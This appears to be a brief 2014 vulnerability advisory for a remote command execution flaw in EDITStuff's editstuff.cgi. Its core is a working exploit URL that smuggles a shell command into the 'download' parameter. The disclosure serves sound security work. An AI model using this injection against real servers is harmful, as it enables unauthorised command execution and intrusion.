EDITStuff version 6 suffers from a remote command execution vulnerability.
06f370fb97a0e7da39a9a0cbebd48d7b55eb97d5f9bebf21fd64712e2f49061e
[+] Remote Comand Execution on EDITStuff
[+] Date: 22/03/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage : http://editstuff.com/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on Windows 7 and Linux
[+] Vulnerable File: editstuff.cgi
[+] Version : all
[+] Exploit: http://host/edit/editstuff.cgi?download=;id|